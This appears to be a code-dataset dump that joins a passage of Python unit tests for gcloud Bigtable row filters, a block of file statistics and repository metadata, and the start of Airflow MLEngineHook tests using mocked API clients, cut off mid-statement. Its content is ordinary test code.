class TestValueRangeFilter(unittest2.TestCase):
    """Unit tests for ``ValueRangeFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ValueRangeFilter
        return ValueRangeFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor_defaults(self):
        # With no arguments: open-ended range, both ends inclusive.
        row_filter = self._makeOne()
        self.assertEqual(row_filter.start_value, None)
        self.assertEqual(row_filter.end_value, None)
        self.assertTrue(row_filter.inclusive_start)
        self.assertTrue(row_filter.inclusive_end)

    def test_constructor_explicit(self):
        start_value = object()
        end_value = object()
        inclusive_start = object()
        inclusive_end = object()
        row_filter = self._makeOne(start_value=start_value,
                                   end_value=end_value,
                                   inclusive_start=inclusive_start,
                                   inclusive_end=inclusive_end)
        self.assertTrue(row_filter.start_value is start_value)
        self.assertTrue(row_filter.end_value is end_value)
        self.assertTrue(row_filter.inclusive_start is inclusive_start)
        self.assertTrue(row_filter.inclusive_end is inclusive_end)

    def test_constructor_bad_start(self):
        # inclusive_start without a start_value is rejected.
        self.assertRaises(ValueError, self._makeOne, inclusive_start=True)

    def test_constructor_bad_end(self):
        # inclusive_end without an end_value is rejected.
        self.assertRaises(ValueError, self._makeOne, inclusive_end=True)

    def test___eq__(self):
        start_value = object()
        end_value = object()
        inclusive_start = object()
        inclusive_end = object()
        row_filter1 = self._makeOne(start_value=start_value,
                                    end_value=end_value,
                                    inclusive_start=inclusive_start,
                                    inclusive_end=inclusive_end)
        row_filter2 = self._makeOne(start_value=start_value,
                                    end_value=end_value,
                                    inclusive_start=inclusive_start,
                                    inclusive_end=inclusive_end)
        self.assertEqual(row_filter1, row_filter2)

    def test___eq__type_differ(self):
        row_filter1 = self._makeOne()
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test_to_pb(self):
        # An unbounded range maps to an empty value_range_filter pb.
        row_filter = self._makeOne()
        expected_pb = _RowFilterPB(
            value_range_filter=_ValueRangePB())
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_inclusive_start(self):
        value = b'some-value'
        row_filter = self._makeOne(start_value=value)
        val_range_pb = _ValueRangePB(start_value_closed=value)
        expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_exclusive_start(self):
        value = b'some-value'
        row_filter = self._makeOne(start_value=value, inclusive_start=False)
        val_range_pb = _ValueRangePB(start_value_open=value)
        expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_inclusive_end(self):
        value = b'some-value'
        row_filter = self._makeOne(end_value=value)
        val_range_pb = _ValueRangePB(end_value_closed=value)
        expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)

    def test_to_pb_exclusive_end(self):
        value = b'some-value'
        row_filter = self._makeOne(end_value=value, inclusive_end=False)
        val_range_pb = _ValueRangePB(end_value_open=value)
        expected_pb = _RowFilterPB(value_range_filter=val_range_pb)
        self.assertEqual(row_filter.to_pb(), expected_pb)
class Test_CellCountFilter(unittest2.TestCase):
    """Unit tests for the private ``_CellCountFilter`` base class."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import _CellCountFilter
        return _CellCountFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The cell count is stored by identity.
        num_cells = object()
        row_filter = self._makeOne(num_cells)
        self.assertTrue(row_filter.num_cells is num_cells)

    def test___eq__type_differ(self):
        num_cells = object()
        row_filter1 = self._makeOne(num_cells)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        num_cells = object()
        row_filter1 = self._makeOne(num_cells)
        row_filter2 = self._makeOne(num_cells)
        self.assertEqual(row_filter1, row_filter2)

    def test___ne__same_value(self):
        num_cells = object()
        row_filter1 = self._makeOne(num_cells)
        row_filter2 = self._makeOne(num_cells)
        comparison_val = (row_filter1 != row_filter2)
        self.assertFalse(comparison_val)
class TestCellsRowOffsetFilter(unittest2.TestCase):
    """Unit tests for ``CellsRowOffsetFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import CellsRowOffsetFilter
        return CellsRowOffsetFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'cells_per_row_offset_filter' field.
        num_cells = 76
        row_filter = self._makeOne(num_cells)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(
            cells_per_row_offset_filter=num_cells)
        self.assertEqual(pb_val, expected_pb)
class TestCellsRowLimitFilter(unittest2.TestCase):
    """Unit tests for ``CellsRowLimitFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import CellsRowLimitFilter
        return CellsRowLimitFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'cells_per_row_limit_filter' field.
        num_cells = 189
        row_filter = self._makeOne(num_cells)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(
            cells_per_row_limit_filter=num_cells)
        self.assertEqual(pb_val, expected_pb)
class TestCellsColumnLimitFilter(unittest2.TestCase):
    """Unit tests for ``CellsColumnLimitFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import CellsColumnLimitFilter
        return CellsColumnLimitFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'cells_per_column_limit_filter' field.
        num_cells = 10
        row_filter = self._makeOne(num_cells)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(
            cells_per_column_limit_filter=num_cells)
        self.assertEqual(pb_val, expected_pb)
class TestStripValueTransformerFilter(unittest2.TestCase):
    """Unit tests for ``StripValueTransformerFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        return StripValueTransformerFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # to_pb() should populate the 'strip_value_transformer' field.
        flag = True
        row_filter = self._makeOne(flag)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(strip_value_transformer=flag)
        self.assertEqual(pb_val, expected_pb)
class TestApplyLabelFilter(unittest2.TestCase):
    """Unit tests for ``ApplyLabelFilter``."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ApplyLabelFilter
        return ApplyLabelFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The label is stored by identity.
        label = object()
        row_filter = self._makeOne(label)
        self.assertTrue(row_filter.label is label)

    def test___eq__type_differ(self):
        label = object()
        row_filter1 = self._makeOne(label)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)

    def test___eq__same_value(self):
        label = object()
        row_filter1 = self._makeOne(label)
        row_filter2 = self._makeOne(label)
        self.assertEqual(row_filter1, row_filter2)

    def test_to_pb(self):
        # to_pb() should populate the 'apply_label_transformer' field.
        label = u'label'
        row_filter = self._makeOne(label)
        pb_val = row_filter.to_pb()
        expected_pb = _RowFilterPB(apply_label_transformer=label)
        self.assertEqual(pb_val, expected_pb)
class Test_FilterCombination(unittest2.TestCase):
    """Unit tests for the private ``_FilterCombination`` base class."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import _FilterCombination
        return _FilterCombination

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor_defaults(self):
        # With no arguments the filter list defaults to empty.
        row_filter = self._makeOne()
        self.assertEqual(row_filter.filters, [])

    def test_constructor_explicit(self):
        filters = object()
        row_filter = self._makeOne(filters=filters)
        self.assertTrue(row_filter.filters is filters)

    def test___eq__(self):
        filters = object()
        row_filter1 = self._makeOne(filters=filters)
        row_filter2 = self._makeOne(filters=filters)
        self.assertEqual(row_filter1, row_filter2)

    def test___eq__type_differ(self):
        filters = object()
        row_filter1 = self._makeOne(filters=filters)
        row_filter2 = object()
        self.assertNotEqual(row_filter1, row_filter2)
class TestRowFilterChain(unittest2.TestCase):
    """Unit tests for ``RowFilterChain`` (AND-composition of filters)."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import RowFilterChain
        return RowFilterChain

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # A chain of two filters serializes both, in order, into 'chain'.
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        row_filter1 = StripValueTransformerFilter(True)
        row_filter1_pb = row_filter1.to_pb()
        row_filter2 = RowSampleFilter(0.25)
        row_filter2_pb = row_filter2.to_pb()
        row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
        filter_pb = row_filter3.to_pb()
        expected_pb = _RowFilterPB(
            chain=_RowFilterChainPB(
                filters=[row_filter1_pb, row_filter2_pb],
            ),
        )
        self.assertEqual(filter_pb, expected_pb)

    def test_to_pb_nested(self):
        # A chain nested inside another chain serializes recursively.
        from gcloud.bigtable.row_filters import CellsRowLimitFilter
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        row_filter1 = StripValueTransformerFilter(True)
        row_filter2 = RowSampleFilter(0.25)
        row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
        row_filter3_pb = row_filter3.to_pb()
        row_filter4 = CellsRowLimitFilter(11)
        row_filter4_pb = row_filter4.to_pb()
        row_filter5 = self._makeOne(filters=[row_filter3, row_filter4])
        filter_pb = row_filter5.to_pb()
        expected_pb = _RowFilterPB(
            chain=_RowFilterChainPB(
                filters=[row_filter3_pb, row_filter4_pb],
            ),
        )
        self.assertEqual(filter_pb, expected_pb)
class TestRowFilterUnion(unittest2.TestCase):
    """Unit tests for ``RowFilterUnion`` (OR/interleave composition)."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import RowFilterUnion
        return RowFilterUnion

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_to_pb(self):
        # A union of two filters serializes both into 'interleave'.
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        row_filter1 = StripValueTransformerFilter(True)
        row_filter1_pb = row_filter1.to_pb()
        row_filter2 = RowSampleFilter(0.25)
        row_filter2_pb = row_filter2.to_pb()
        row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
        filter_pb = row_filter3.to_pb()
        expected_pb = _RowFilterPB(
            interleave=_RowFilterInterleavePB(
                filters=[row_filter1_pb, row_filter2_pb],
            ),
        )
        self.assertEqual(filter_pb, expected_pb)

    def test_to_pb_nested(self):
        # A union nested inside another union serializes recursively.
        from gcloud.bigtable.row_filters import CellsRowLimitFilter
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        row_filter1 = StripValueTransformerFilter(True)
        row_filter2 = RowSampleFilter(0.25)
        row_filter3 = self._makeOne(filters=[row_filter1, row_filter2])
        row_filter3_pb = row_filter3.to_pb()
        row_filter4 = CellsRowLimitFilter(11)
        row_filter4_pb = row_filter4.to_pb()
        row_filter5 = self._makeOne(filters=[row_filter3, row_filter4])
        filter_pb = row_filter5.to_pb()
        expected_pb = _RowFilterPB(
            interleave=_RowFilterInterleavePB(
                filters=[row_filter3_pb, row_filter4_pb],
            ),
        )
        self.assertEqual(filter_pb, expected_pb)
class TestConditionalRowFilter(unittest2.TestCase):
    """ConditionalRowFilter must serialize to a ``condition`` RowFilter."""

    def _getTargetClass(self):
        from gcloud.bigtable.row_filters import ConditionalRowFilter
        return ConditionalRowFilter

    def _makeOne(self, *args, **kwargs):
        return self._getTargetClass()(*args, **kwargs)

    def test_constructor(self):
        # The three filters are stored by identity, not copied.
        base, on_true, on_false = object(), object(), object()
        cond = self._makeOne(base, true_filter=on_true, false_filter=on_false)
        self.assertTrue(cond.base_filter is base)
        self.assertTrue(cond.true_filter is on_true)
        self.assertTrue(cond.false_filter is on_false)

    def test___eq__(self):
        base, on_true, on_false = object(), object(), object()
        first = self._makeOne(base, true_filter=on_true,
                              false_filter=on_false)
        second = self._makeOne(base, true_filter=on_true,
                               false_filter=on_false)
        self.assertEqual(first, second)

    def test___eq__type_differ(self):
        base, on_true, on_false = object(), object(), object()
        cond = self._makeOne(base, true_filter=on_true,
                             false_filter=on_false)
        self.assertNotEqual(cond, object())

    def test_to_pb(self):
        from gcloud.bigtable.row_filters import CellsRowOffsetFilter
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        predicate = StripValueTransformerFilter(True)
        predicate_pb = predicate.to_pb()
        on_true = RowSampleFilter(0.25)
        on_true_pb = on_true.to_pb()
        on_false = CellsRowOffsetFilter(11)
        on_false_pb = on_false.to_pb()
        cond = self._makeOne(predicate, true_filter=on_true,
                             false_filter=on_false)
        expected_pb = _RowFilterPB(
            condition=_RowFilterConditionPB(
                predicate_filter=predicate_pb,
                true_filter=on_true_pb,
                false_filter=on_false_pb,
            ),
        )
        self.assertEqual(cond.to_pb(), expected_pb)

    def test_to_pb_true_only(self):
        # Omitting false_filter leaves that field unset in the condition.
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        predicate = StripValueTransformerFilter(True)
        predicate_pb = predicate.to_pb()
        on_true = RowSampleFilter(0.25)
        on_true_pb = on_true.to_pb()
        cond = self._makeOne(predicate, true_filter=on_true)
        expected_pb = _RowFilterPB(
            condition=_RowFilterConditionPB(
                predicate_filter=predicate_pb,
                true_filter=on_true_pb,
            ),
        )
        self.assertEqual(cond.to_pb(), expected_pb)

    def test_to_pb_false_only(self):
        # Omitting true_filter leaves that field unset in the condition.
        from gcloud.bigtable.row_filters import RowSampleFilter
        from gcloud.bigtable.row_filters import StripValueTransformerFilter
        predicate = StripValueTransformerFilter(True)
        predicate_pb = predicate.to_pb()
        on_false = RowSampleFilter(0.25)
        on_false_pb = on_false.to_pb()
        cond = self._makeOne(predicate, false_filter=on_false)
        expected_pb = _RowFilterPB(
            condition=_RowFilterConditionPB(
                predicate_filter=predicate_pb,
                false_filter=on_false_pb,
            ),
        )
        self.assertEqual(cond.to_pb(), expected_pb)
def _ColumnRangePB(*args, **kw):
    """Build a ``ColumnRange`` protobuf (import deferred to call time)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.ColumnRange(*args, **kw)
def _RowFilterPB(*args, **kw):
    """Build a ``RowFilter`` protobuf (import deferred to call time)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.RowFilter(*args, **kw)
def _RowFilterChainPB(*args, **kw):
    """Build a ``RowFilter.Chain`` protobuf (import deferred to call time)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.RowFilter.Chain(*args, **kw)
def _RowFilterConditionPB(*args, **kw):
    """Build a ``RowFilter.Condition`` protobuf (import deferred)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.RowFilter.Condition(*args, **kw)
def _RowFilterInterleavePB(*args, **kw):
    """Build a ``RowFilter.Interleave`` protobuf (import deferred)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.RowFilter.Interleave(*args, **kw)
def _TimestampRangePB(*args, **kw):
    """Build a ``TimestampRange`` protobuf (import deferred to call time)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.TimestampRange(*args, **kw)
def _ValueRangePB(*args, **kw):
    """Build a ``ValueRange`` protobuf (import deferred to call time)."""
    from gcloud.bigtable._generated import data_pb2 as data_v2_pb2
    return data_v2_pb2.ValueRange(*args, **kw)
| 34.631737
| 76
| 0.668569
| 3,949
| 34,701
| 5.497594
| 0.061028
| 0.047628
| 0.040626
| 0.040626
| 0.833118
| 0.804975
| 0.781115
| 0.75836
| 0.733164
| 0.709581
| 0
| 0.013221
| 0.250166
| 34,701
| 1,001
| 77
| 34.666334
| 0.821138
| 0.020201
| 0
| 0.710145
| 0
| 0
| 0.007886
| 0.000647
| 0
| 0
| 0
| 0
| 0.123847
| 1
| 0.177866
| false
| 0.00527
| 0.068511
| 0.031621
| 0.350461
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c29080c554a8c74b920e4e5258149cec28753af
| 40,770
|
py
|
Python
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 1
|
2021-09-16T17:20:00.000Z
|
2021-09-16T17:20:00.000Z
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 20
|
2017-04-18T19:47:46.000Z
|
2020-01-13T04:19:24.000Z
|
tests/gcp/hooks/test_mlengine.py
|
robobario/airflow
|
702005fe35dc5b996a5c5b8d349ed36036472f00
|
[
"Apache-2.0"
] | 2
|
2018-09-15T07:13:01.000Z
|
2021-03-26T07:27:38.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from copy import deepcopy
from unittest import mock
from googleapiclient.errors import HttpError
from airflow import AirflowException
from airflow.gcp.hooks import mlengine as hook
from tests.compat import PropertyMock
from tests.gcp.utils.base_gcp_mock import (
GCP_PROJECT_ID_HOOK_UNIT_TEST, mock_base_gcp_hook_default_project_id,
mock_base_gcp_hook_no_default_project_id,
)
class TestMLEngineHook(unittest.TestCase):
    """Unit tests for MLEngineHook with an explicit ``project_id`` argument.

    Every test patches ``MLEngineHook.get_conn`` so no network call is made;
    the googleapiclient fluent chains (``projects().models()...``) are driven
    by configuring ``return_value``/``side_effect`` on the mock and verified
    with ``assert_has_calls``.
    """

    def setUp(self) -> None:
        super().setUp()
        self.hook = hook.MLEngineHook()

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook._authorize")
    @mock.patch("airflow.gcp.hooks.mlengine.build")
    def test_mle_engine_client_creation(self, mock_build, mock_authorize):
        # get_conn() builds a v1 'ml' discovery client with caching disabled.
        result = self.hook.get_conn()
        self.assertEqual(mock_build.return_value, result)
        mock_build.assert_called_with(
            'ml', 'v1', http=mock_authorize.return_value, cache_discovery=False
        )

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_version(self, mock_get_conn):
        # create_version() must merge an 'airflow-version' label into existing
        # labels and poll the returned operation until done.
        project_id = 'test-project'
        model_name = 'test-model'
        version_name = 'test-version'
        version = {
            'name': version_name,
            'labels': {'other-label': 'test-value'}
        }
        version_with_airflow_version = {
            'name': 'test-version',
            'labels': {
                'other-label': 'test-value',
                'airflow-version': hook._AIRFLOW_VERSION
            }
        }
        operation_path = 'projects/{}/operations/test-operation'.format(project_id)
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            create.return_value.
            execute.return_value
        ) = version
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.return_value
        ) = {'name': operation_path, 'done': True}
        create_version_response = self.hook.create_version(
            project_id=project_id,
            model_name=model_name,
            version_spec=deepcopy(version)
        )
        self.assertEqual(create_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().create(
                body=version_with_airflow_version,
                parent=model_path
            ),
            mock.call().projects().models().versions().create().execute(),
            mock.call().projects().operations().get(name=version_name),
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_version_with_labels(self, mock_get_conn):
        # Variant: version spec without labels — the hook must add a fresh
        # labels dict containing only 'airflow-version'.
        project_id = 'test-project'
        model_name = 'test-model'
        version_name = 'test-version'
        version = {'name': version_name}
        version_with_airflow_version = {
            'name': 'test-version',
            'labels': {'airflow-version': hook._AIRFLOW_VERSION}
        }
        operation_path = 'projects/{}/operations/test-operation'.format(project_id)
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            create.return_value.
            execute.return_value
        ) = version
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.return_value
        ) = {'name': operation_path, 'done': True}
        create_version_response = self.hook.create_version(
            project_id=project_id,
            model_name=model_name,
            version_spec=deepcopy(version)
        )
        self.assertEqual(create_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().create(
                body=version_with_airflow_version,
                parent=model_path
            ),
            mock.call().projects().models().versions().create().execute(),
            mock.call().projects().operations().get(name=version_name),
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_set_default_version(self, mock_get_conn):
        # setDefault is called with an empty body and the full version path.
        project_id = 'test-project'
        model_name = 'test-model'
        version_name = 'test-version'
        operation_path = 'projects/{}/operations/test-operation'.format(project_id)
        version_path = 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name)
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            setDefault.return_value.
            execute.return_value
        ) = operation_done
        set_default_version_response = self.hook.set_default_version(
            project_id=project_id,
            model_name=model_name,
            version_name=version_name
        )
        self.assertEqual(set_default_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().setDefault(body={}, name=version_path),
            mock.call().projects().models().versions().setDefault().execute()
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_list_versions(self, mock_get_conn, mock_sleep):
        # Three pages: list() returns the first request; list_next() yields the
        # remaining requests and finally None to terminate pagination.
        project_id = 'test-project'
        model_name = 'test-model'
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        version_names = ['ver_{}'.format(ix) for ix in range(3)]
        response_bodies = [
            {
                'nextPageToken': "TOKEN-{}".format(ix),
                'versions': [ver]
            } for ix, ver in enumerate(version_names)]
        # The final page carries no nextPageToken.
        response_bodies[-1].pop('nextPageToken')
        pages_requests = [
            mock.Mock(**{'execute.return_value': body}) for body in response_bodies
        ]
        versions_mock = mock.Mock(
            **{'list.return_value': pages_requests[0], 'list_next.side_effect': pages_requests[1:] + [None]}
        )
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value
        ) = versions_mock
        list_versions_response = self.hook.list_versions(
            project_id=project_id, model_name=model_name)
        self.assertEqual(list_versions_response, version_names)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().list(pageSize=100, parent=model_path),
            mock.call().projects().models().versions().list().execute(),
        ] + [
            mock.call().projects().models().versions().list_next(
                previous_request=pages_requests[i], previous_response=response_bodies[i]
            ) for i in range(3)
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_version(self, mock_get_conn):
        # The delete operation is polled: first not-done, then done.
        project_id = 'test-project'
        model_name = 'test-model'
        version_name = 'test-version'
        operation_path = 'projects/{}/operations/test-operation'.format(project_id)
        version_path = 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name)
        version = {'name': operation_path}
        operation_not_done = {'name': operation_path, 'done': False}
        operation_done = {'name': operation_path, 'done': True}
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.side_effect
        ) = [operation_not_done, operation_done]
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            delete.return_value.
            execute.return_value
        ) = version
        delete_version_response = self.hook.delete_version(
            project_id=project_id, model_name=model_name,
            version_name=version_name)
        self.assertEqual(delete_version_response, operation_done)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().versions().delete(name=version_path),
            mock.call().projects().models().versions().delete().execute(),
            mock.call().projects().operations().get(name=operation_path),
            mock.call().projects().operations().get().execute()
        ], any_order=True)

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_model(self, mock_get_conn):
        # create_model() adds the 'airflow-version' label to a label-less model.
        project_id = 'test-project'
        model_name = 'test-model'
        model = {
            'name': model_name,
        }
        model_with_airflow_version = {
            'name': model_name,
            'labels': {'airflow-version': hook._AIRFLOW_VERSION}
        }
        project_path = 'projects/{}'.format(project_id)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            create.return_value.
            execute.return_value
        ) = model
        create_model_response = self.hook.create_model(
            project_id=project_id, model=deepcopy(model)
        )
        self.assertEqual(create_model_response, model)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().create(body=model_with_airflow_version, parent=project_path),
            mock.call().projects().models().create().execute()
        ])

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_create_model_with_labels(self, mock_get_conn):
        # Pre-existing labels must be preserved alongside 'airflow-version'.
        project_id = 'test-project'
        model_name = 'test-model'
        model = {
            'name': model_name,
            'labels': {'other-label': 'test-value'}
        }
        model_with_airflow_version = {
            'name': model_name,
            'labels': {
                'other-label': 'test-value',
                'airflow-version': hook._AIRFLOW_VERSION
            }
        }
        project_path = 'projects/{}'.format(project_id)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            create.return_value.
            execute.return_value
        ) = model
        create_model_response = self.hook.create_model(
            project_id=project_id, model=deepcopy(model)
        )
        self.assertEqual(create_model_response, model)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().create(body=model_with_airflow_version, parent=project_path),
            mock.call().projects().models().create().execute()
        ])

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_get_model(self, mock_get_conn):
        project_id = 'test-project'
        model_name = 'test-model'
        model = {'model': model_name}
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            get.return_value.
            execute.return_value
        ) = model
        get_model_response = self.hook.get_model(
            project_id=project_id, model_name=model_name
        )
        self.assertEqual(get_model_response, model)
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().get(name=model_path),
            mock.call().projects().models().get().execute()
        ])

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_model(self, mock_get_conn):
        project_id = 'test-project'
        model_name = 'test-model'
        model = {'model': model_name}
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            delete.return_value.
            execute.return_value
        ) = model
        self.hook.delete_model(
            project_id=project_id, model_name=model_name
        )
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().delete(name=model_path),
            mock.call().projects().models().delete().execute()
        ])

    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.log")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_model_when_not_exists(self, mock_get_conn, mock_log):
        # A 404 from delete must be swallowed and logged, not raised.
        project_id = 'test-project'
        model_name = 'test-model'
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        http_error = HttpError(
            resp=mock.MagicMock(status=404, reason="Model not found."),
            content=b'Model not found.'
        )
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            delete.return_value.
            execute.side_effect
        ) = [http_error]
        self.hook.delete_model(
            project_id=project_id, model_name=model_name
        )
        mock_get_conn.assert_has_calls([
            mock.call().projects().models().delete(name=model_path),
            mock.call().projects().models().delete().execute()
        ])
        mock_log.error.assert_called_once_with('Model was not found: %s', http_error)

    @mock.patch("airflow.gcp.hooks.mlengine.time.sleep")
    @mock.patch("airflow.gcp.hooks.mlengine.MLEngineHook.get_conn")
    def test_delete_model_with_contents(self, mock_get_conn, mock_sleep):
        # delete_contents=True: every version (default included) is deleted
        # before the model itself.
        project_id = 'test-project'
        model_name = 'test-model'
        model_path = 'projects/{}/models/{}'.format(project_id, model_name)
        operation_path = 'projects/{}/operations/test-operation'.format(project_id)
        operation_done = {'name': operation_path, 'done': True}
        version_names = ["AAA", "BBB", "CCC"]
        versions = [{
            'name': 'projects/{}/models/{}/versions/{}'.format(project_id, model_name, version_name),
            "isDefault": i == 0
        } for i, version_name in enumerate(version_names)]
        (
            mock_get_conn.return_value.
            projects.return_value.
            operations.return_value.
            get.return_value.
            execute.return_value
        ) = operation_done
        (
            mock_get_conn.return_value.
            projects.return_value.
            models.return_value.
            versions.return_value.
            list.return_value.
            execute.return_value
        ) = {"versions": versions}
        (
